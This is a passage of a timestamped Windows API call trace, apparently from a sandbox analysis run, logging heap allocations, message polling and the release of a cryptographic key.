lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0148.231] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e509b0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.232] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.232] CryptDestroyKey (hKey=0xa87510) returned 1 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0148.232] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0148.232] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.233] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0148.233] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0148.233] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0148.234] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0148.234] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0148.234] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0148.234] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508d8 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0148.234] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0148.234] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0148.234] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0148.235] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0148.235] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0148.235] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0148.236] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0148.236] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0148.236] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.236] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.236] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0148.236] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0148.236] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0148.236] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0148.237] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0148.237] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0148.238] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0148.238] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0148.238] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.238] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.238] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0148.238] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0148.239] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0148.239] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.239] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0148.239] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0148.239] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0148.240] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0148.240] 